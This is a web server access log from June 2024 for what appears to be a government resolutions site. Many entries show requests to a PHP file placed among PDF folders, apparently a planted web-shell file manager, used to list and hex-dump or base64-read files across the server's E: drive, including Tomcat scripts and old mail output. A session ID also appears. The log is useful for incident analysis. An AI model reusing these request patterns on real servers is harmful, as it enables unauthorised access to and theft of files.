47.128.46.87 - - [29/Jun/2024:18:07:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.46.87 - - [29/Jun/2024:18:07:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.46.87 - - [29/Jun/2024:18:07:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.46.87 - - [29/Jun/2024:18:07:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.46.87 - - [29/Jun/2024:18:07:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_jar HTTP/1.1" 200 1034
47.128.46.87 - - [29/Jun/2024:18:07:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.46.87 - - [29/Jun/2024:18:07:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.46.87 - - [29/Jun/2024:18:07:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.46.87 - - [29/Jun/2024:18:07:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
66.249.66.11 - - [29/Jun/2024:18:07:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/2554.pdf HTTP/1.1" 200 539503
47.128.125.29 - - [29/Jun/2024:18:07:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1613.pdf&ft=info&fullhexdump=1 HTTP/1.1" 200 694430
201.245.192.253 - - [29/Jun/2024:18:07:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.12 - - [29/Jun/2024:18:07:55 -0500] "GET /BLA/resoluciones/AUTOS%202023/0173.pdf HTTP/1.1" 200 2095494
66.249.66.12 - - [29/Jun/2024:18:07:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1510.pdf HTTP/1.1" 200 802374
66.249.66.12 - - [29/Jun/2024:18:07:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0401.pdf HTTP/1.1" 200 852519
66.249.66.12 - - [29/Jun/2024:18:07:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0151.pdf HTTP/1.1" 200 629381
201.245.192.253 - - [29/Jun/2024:18:07:56 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:18:07:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.23.70 - - [29/Jun/2024:18:07:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1479.pdf&ft=info&fullhexdump=1 HTTP/1.1" 200 1246197
172.22.2.4 - - [29/Jun/2024:18:06:20 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.47.104 - - [29/Jun/2024:18:08:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1661.pdf&ft=info&fullhexdump=1 HTTP/1.1" 200 622254
47.128.50.167 - - [29/Jun/2024:18:08:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3519.pdf&ft=info&fullhexdump=1 HTTP/1.1" 200 1312805
66.249.66.13 - - [29/Jun/2024:18:08:31 -0500] "GET /BLA/resoluciones/AUTOS%202014/1882.pdf HTTP/1.1" 200 526619
47.128.16.55 - - [29/Jun/2024:18:08:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=6383.pdf&ft=info HTTP/1.1" 200 3843
47.128.16.55 - - [29/Jun/2024:18:08:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.16.55 - - [29/Jun/2024:18:08:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.16.55 - - [29/Jun/2024:18:08:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_pdf HTTP/1.1" 200 1034
47.128.16.55 - - [29/Jun/2024:18:08:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.16.55 - - [29/Jun/2024:18:08:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.16.55 - - [29/Jun/2024:18:08:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.16.55 - - [29/Jun/2024:18:08:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.16.55 - - [29/Jun/2024:18:08:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.16.55 - - [29/Jun/2024:18:08:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.16.55 - - [29/Jun/2024:18:08:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.123.130 - - [29/Jun/2024:18:08:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=1&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cvehiculos%5C&f=vehiculos.html&ft=info HTTP/1.1" 200 5276
47.128.123.130 - - [29/Jun/2024:18:08:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.123.130 - - [29/Jun/2024:18:08:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.123.130 - - [29/Jun/2024:18:08:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.123.130 - - [29/Jun/2024:18:08:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.123.130 - - [29/Jun/2024:18:08:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.123.130 - - [29/Jun/2024:18:08:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.123.130 - - [29/Jun/2024:18:08:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.123.130 - - [29/Jun/2024:18:08:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.123.130 - - [29/Jun/2024:18:08:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
172.22.2.4 - - [29/Jun/2024:18:07:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
66.249.66.11 - - [29/Jun/2024:18:08:55 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Otros%20Elementos/Infografia/Parte2/M-90.png HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:18:08:56 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [29/Jun/2024:18:08:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1620.pdf HTTP/1.1" 200 713104
47.128.123.164 - - [29/Jun/2024:18:08:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Cmailoutput&f=mail-20150907-0359-894000.txt&ft=info HTTP/1.1" 200 3772
47.128.123.164 - - [29/Jun/2024:18:08:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.123.164 - - [29/Jun/2024:18:08:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.123.164 - - [29/Jun/2024:18:08:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.123.164 - - [29/Jun/2024:18:08:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.123.164 - - [29/Jun/2024:18:08:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.123.164 - - [29/Jun/2024:18:08:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.123.164 - - [29/Jun/2024:18:08:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.123.164 - - [29/Jun/2024:18:08:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.123.164 - - [29/Jun/2024:18:08:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.123.10 - - [29/Jun/2024:18:09:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Ctomcat%5Cbin&f=shutdown.bat&ft=info HTTP/1.1" 200 3692
47.128.123.10 - - [29/Jun/2024:18:09:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.123.10 - - [29/Jun/2024:18:09:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_bat HTTP/1.1" 200 131
47.128.123.10 - - [29/Jun/2024:18:09:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.123.10 - - [29/Jun/2024:18:09:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.123.10 - - [29/Jun/2024:18:09:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.123.10 - - [29/Jun/2024:18:09:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.123.10 - - [29/Jun/2024:18:09:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
